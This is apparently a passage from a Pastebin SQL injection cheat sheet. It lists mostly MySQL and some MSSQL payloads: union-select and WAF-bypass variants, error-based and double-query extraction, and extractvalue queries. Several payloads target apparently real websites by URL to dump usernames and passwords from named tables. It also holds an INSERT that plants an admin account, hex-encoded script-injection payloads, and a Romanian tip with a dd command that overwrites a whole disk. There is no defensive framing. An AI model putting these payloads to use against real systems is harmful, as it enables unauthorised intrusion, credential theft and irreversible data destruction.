  722. +And(select 1)=(select 0xAAAA)+union+select
  723. +1–
  724. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  725. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  726. +And(select 1)=(select 0×4141414141414
  727. 141414141414141414141414141414
  728. 141414141414141414141414141414?1414
  729. 141414141414141414141414141414
  730. 141414141414141414141414141414
  731. 14141414141414141414 141414141414141
  732. 414141414141414141414141414141
  733. 4141414141414141414141414141414?141
  734. 414141414141414141414141414141
  735. 414141414141414141414141414141
  736. 41414141414141414141 414141414141414
  737. 141414141414141414141414141414
  738. 14141414141414141414141414141414141
  739. 414141414141414141414141414141
  740. 414141414141414141414141414141
  741. 41414141414141414141 414141414141414
  742. 141414141414141414141414141414
  743. 14141414141414141414141414141414141
  744. 414141414141414141414141414141
  745. 414141414141414141414141414141
  746. 41414141414141414141 414141414141414
  747. 141414141414141414141414141414
  748. 14141414141414141414141414141414141 4141)+
  749. ==============================
  750. ==============================
  751. ==============================
  752. =========================================
  753. [+] Group Concat:
  754. ==============================
  755. ==============================
  756. ==============================
  757. =========================================
  758. Group_Concat
  759. group_concat()
  760. /*!group_concat*/()
  761. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  762. group_concat(,0x3c62723e)
  763. g%72oup_c%6Fncat%28%76%65rsion%28%29,
  764. %22testtest%22%29
  765. CoNcAt()
  766. CONCAT(DISTINCT Version())
  767. concat(,0x3a,)
  768. concat%00()
  769. %00CoNcAt()
  770. /*!50000cOnCat*/(/*!Version()*/)
  771. /*!50000cOnCat*/
  772. /**//*!12345cOnCat*/(,0x3a,)
  773. concat_ws()
  774. concat(0x3a,,0x3c62723e)
  775. /*!concat_ws(0x3a,)*/
  776. concat_ws(0x3a3a3a,version()
  777. CONCAT_WS(CHAR(32,58,32),version(),)
  778. ==============================
  779. ==============================
  780. ==============================
  781. =========================================
  782. ERORE BASED
  783. ==============================
  784. ==============================
  785. ==============================
  786. =========================================
  787. =21 or 1 group by concat_ws(0x3a,version(),floor
  788. (rand(0)*2)) having min(0) or 1–
  789. Database
  790. 21 and (select 1 from (select count(*),concat
  791. ((select(select concat(cast(database() as
  792. char),0x7e)) from information_schema.tables
  793. where table_schema=database() limit 0,1),floor
  794. (rand(0)*2))x from information_schema.tables
  795. group by x)a)
  796. Table_name
  797. and (select 1 from (select count(*),concat((select
  798. (select concat(cast(table_name as char),0x7e))
  799. from information_schema.tables where
  800. table_schema=database() limit 19,1),floor(rand
  801. (0)*2))x from information_schema.tables group
  802. by x)a)
  803. Columns
  804. 21 and (select 1 from (select count(*),concat
  805. ((select(select concat(cast(column_name as
  806. char),0x7e)) from information_schema.columns
  807. where table_name=0x73657474696e6773 limit
  808. 2,1),floor(rand(0)*2))x from information_sch
  809. ema.tables group by x)a)
  810. extract date
  811. http://www.aliqbalschools.org/index.php?
  812. mode=getpagecontent&pageID=21 and (select 1
  813. from (select count(*),concat((select(select concat
  814. (cast(concat(userName,0x7e,passWord) as
  815. char),0x7e)) from iqbal_iqbal.settings limit
  816. 0,1),floor(rand(0)*2))x from information_sch
  817. ema.tables group by x)a)
  818. Notice the limit function in the query
  819. A website can have more than 2 two databases,
  820. so increase the limit until you find all database
  821. names
  822. Example: limit 0,1 or limit 1,1 or limit 2,1
  823. ==============================
  824. ==============================
  825. ==============================
  826. =========================================
  827. Differences:
  828. Error Based Query for Database Extraction:
  829. ==============================
  830. ==============================
  831. ==============================
  832. =========================================
  833. and (select 1 from (select count(*),concat((select
  834. (select concat(cast(database() as char),0x7e))
  835. from information_schema.tables where
  836. table_schema=database() limit 0,1),floor(rand
  837. (0)*2))x from information_schema.tables group
  838. by x)a)
  839. Double Query for Database Extraction:
  840. and(select 1 from(select count(*),concat((select
  841. (select concat(0x7e,0×27,cast(database() as
  842. char),0×27,0x7e)) from information_sch
  843. ema.tables limit 0,1),floor(rand(0)*2))x from
  844. information_schema.tables group by x)a) and 1=1
  845. and(select 1 from(select count(*),concat((select
  846. (select (SELECT distinct
  847. concat(0x7e,0×27,cast(schema_name as
  848. char),0×27,0x7e) FROM information_sch
  849. ema.schemata LIMIT N,1)) from
  850. information_schema.tables limit 0,1),floor(rand
  851. (0)*2))x from information_schema.tables group
  852. by x)a) and 1=1
  853. and(select 1 from(select count(*),concat((select
  854. (select (SELECT distinct
  855. concat(0x7e,0×27,cast(table_name as
  856. char),0×27,0x7e) FROM information_sch
  857. ema.tables Where
  858. table_schema=0xhex_code_of_database_name
  859. LIMIT N,1)) from information_schema.tables limit
  860. 0,1),floor(rand(0)*2))x from
  861. information_schema.tables group by x)a) and 1
  862. ==============================
  863. ==============================
  864. ==============================
  865. =========================================
  866. WUBI +and+extractvalue(rand(),concat(0x3e,
  867. (select+concat(username,0x7e,password)+from
  868. +iw_users+limit+0,1)))–+
  869. ==============================
  870. ==============================
  871. ==============================
  872. =========================================
  873. Descarci orice linux live, bootezi dupa el si
  874. formatezi cu dd+urandom. De acolo nu mai
  875. recupereaza NIMENI ceva.
  876. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  877. I’d say using concat(0xY)
  878. Y being ‘<script>alert(‘Text here’);</script>’ in
  879. hex
  880. union select concat(version,0x3c73637269707
  881. 43e616c6572742827706833776c272
  882. 93c2f7363726970743e)
  883. http://zerocoolhf.altervista.org/level2.php?id=-1
  884. %27%20union%20select%20*%20from
  885. %28%28select%201%29a%20join%20%28select
  886. %20version%28%29%29b%20join%20%28select
  887. %20database%28%29%29c%29 –+
  888. union select 1,group_concat(column_name),3
  889. FROM information_schema.columns WHERE
  890. table_name=concat(’0x’, hex(‘users’)
  891. =113′+and+0+union+select+1,(SELECT (@)
  892. FROM (SELECT(@:=0×00),(SELECT (@) FROM
  893. (information_schema.columns) WHERE
  894. (table_schema>=@) AND (@)IN (@:=CONCAT
  895. (@,0x3C7363726970743E616C6572742827
  896. ,’ [ ',table_schema,' ] >’,table_name,’ >
  897. ‘,column_name,0x27293B3C2F7363
  898. 726970743E))))x),3–+–
  899. injection in sql database addd new user
  900. INSERT INTO admins (`name`,`password`,`email`)
  901. VALUES (‘unix’,'unixunix’,'unix_chro@
  902. yahoo.com’)
  903. +and+(select+1+from+(select+count(*),concat((
  904. select(select+concat(cast(table_nam e+as
  905. +char),0x7e))+from+information_schema.tables
  906. +where+table_schema=0xDATABASEHE X+limit
  907. +0,1),floor(rand(0)*2))x+from+informat
  908. ion_schema.tables+group+by+x)a)
  909. CHALLENGES
  910. Code:
  911. =(13)and(0)union(select(1),group_concat(colum
  912. n_name,0x3c62723e),(3)from(inf
  913. ormation_schema.columns)where(
  914. table_schema=database())and(ta
  915. ble_name=0×7365637572697479))–+-
  916. =12+and+false/*!union*/ /*!select*/
  917. 1,group_concat(0x3c62723e,/*!TabLe_NaMe*/
  918. ),2,concat(user(),0x2a,database(),0x2a,version
  919. ()),13,0x3c666f6e7420636f6c6f7
  920. 23d626c75653e3c68323e706833776c,15 from
  921. information_schema.tables where
  922. table_schema=0x66616272697a696
  923. f5f636572697070 LiMit 0,1–
  924. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version
  925. (),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!
  926. fRoM*/ security–
  927. =121)+and(0)+/*!uNion*/+/*!seleCt*/
  928. +1,2,3,4,version(),6,7– -
  929. =121)/**/and false UNION(SELECT
  930. 1,2,3,4,5,6,7)–+-
  931. =121 div 0 ) /*!UNION*/ /*!SELECT*/
  932. 1,2,3,4,5,6,version()# |
  933. null’+union+select+1,2,count(schema_name),4,5
  934. +from+information_schema.schemata– x
  935. ==============================
  936. ==============================
  937. ==============================
  938. =========================================
  939. Error Based:
  940. ==============================
  941. ==============================
  942. ==============================
  943. =========================================
  944. +or+1+group+by+concat_ws(0x7e,version(),floor
  945. (rand(0)*2))+having+min(0)+or+1–
  946. or 1 group by concat(0x3a,(select substr
  947. (group_concat(username,0x3a,password),1,150)
  948. from rmdsz_user),floor(rand(0)*2)) having min(0)
  949. or 1– -
  950. or 1 group by concat_ws(0x7e,version(),floor
  951. (rand(0)*2)) having min(0) or 1 — -
  952. and (select 1 from (select count(*),concat((select
  953. (select concat(cast(database() as char),0x7e))
  954. from information_schema.tables where
  955. table_schema=database() limit 0,1),floor(rand
  956. (0)*2))x from information_schema.tables group
  957. by x)a)
  958. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION
  959. SELECT null UNION SELECT !1)x GROUP by
  960. CONCAT((SELECT version() FROM
  961. information_schema.tables LIMIT 0,1),FLOOR
  962. (RAND(0)*2)))
  963. +and+(select+1+from+(select+count(*)+from+(se
  964. lect+1+union+select+2+union+select+ 3)x+group
  965. +by+concat(mid((select+concat_ws(0x7
  966. e,version(),0x7e)+from+information_
  967. schema.tables+limit+0,1),1,25),floor(rand(0)*
  968. 2)))a)– x
  969. or 1=convert(int,(@@version))-
  970. +or+1+group+by+concat_ws(0x7e,version(),floor
  971. (rand(0)*2))+having+min(0)+or+1–
  972. +and+(select+1+from+(select+count(*),concat((
  973. select(select+concat(c ast(count(schem
  974. a_name)+as+char),0x7e))+from+i
  975. nformation_schema.schemata+limit+0, 1),floor
  976. (rand(0)*2))x+from+information_schema.tables
  977. +group+by+x)a)
  978. (42)and(0)union(select(1),2,version(),4,5,0x3
  979. c623e3c666f6e7420636f6c6f723d6
  980. 26c75653e706833776c,7,8,9,(10))–+-
  981. ==============================
  982. ==============================
  983. ==============================
  984. =========================================
  985. WAF BYPASS BY TOTTI
  986. ==============================
  987. ==============================
  988. ==============================
  989. =========================================
  990. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/
  991. 1337,concat_ws(0x203a20,0x746f7
  992. 474693933,table_nam e)/*1337*/FROM/*1337*/
  993. INFORMATION_SCHEMA./*!TABLES*//*1337*/
  994. WHERE/*1337*/TABLE_SCHEMA=database())– -
  995. =2+and(0)+union+distinctROW+select+1,/*!
  996. 50000CoNcaT*/(0x706833776c,0x
  997. 3a,table_name) /*!froM*/ /*!InfORmaTion_sc
  998. Hema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/
  999. =database()– -
  1000. ==============================
  1001. ==============================
  1002. ==============================
  1003. =========================================
  1004. WUBI – 1,(select(@x)from(select(@x:=0×00),
  1005. (select(0)from(information_schema.column
  1006. s)where(table_schema!=0×69)and(0×00)in
  1007. (@x:=concat(@x,0x3c62723e,table_schem
  1008. a,0x2020203d3e3e202020,table_n
  1009. ame,0x20203a3a3a32020,column_n
  1010. ame))))x),3,4–
  1011. (select (@) from (select(@:=0×00),(select (@)
  1012. from (information_schema.columns) where
  1013. (table_schema>=@) and (@)in (@:=concat(@,0x
  1014. 0a,’ [ ',table_schema,' ] >’,table_name,’ >
  1015. ‘,column_name))))x)
  1016. (select (@) from (select (@x:=0×00),(select (@)
  1017. from (database.table) where (@) in (@:=concat
  1018. (@,0x0a,columns)))x)
  1019. (select (@) from (select (@x:=0×00),(select (@)
  1020. from (database.table) where (@) in (@:=concat
  1021. (@,0x0a,columns)))x)
  1022. ==============================
  1023. ==============================
  1024. ==============================
  1025. =========================================
  1026. +and+1=convert(int,SERVERPROPERTY
  1027. (‘ProductVersion’))
  1028. ==============================
  1029. ==============================
  1030. ==============================
  1031. =========================================
  1032. http://zerofreak.blogspot.it/2012/02/tutorial-by-
  1033. zer0freak-zer0freak-sqli.html
  1034. http://www.websec.ca/kb/sql_injection
  1035. http://www.hellboundhackers.org/articles/862-
  1036. mysql-injection-complete-tutorial.html
  1037. ==============================
  1038. ==============================
  1039. ==============================
  1040. =========================================
  1041. test
  1042. http://www.mt.ro/nou/articol.php?id=-
  1043. angajari’+and+extractvalue(rand(),concat(0x3e,
  1044. (select+concat(username,0x7e,password)+from
  1045. +iw_users+limit+0,1)))–+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!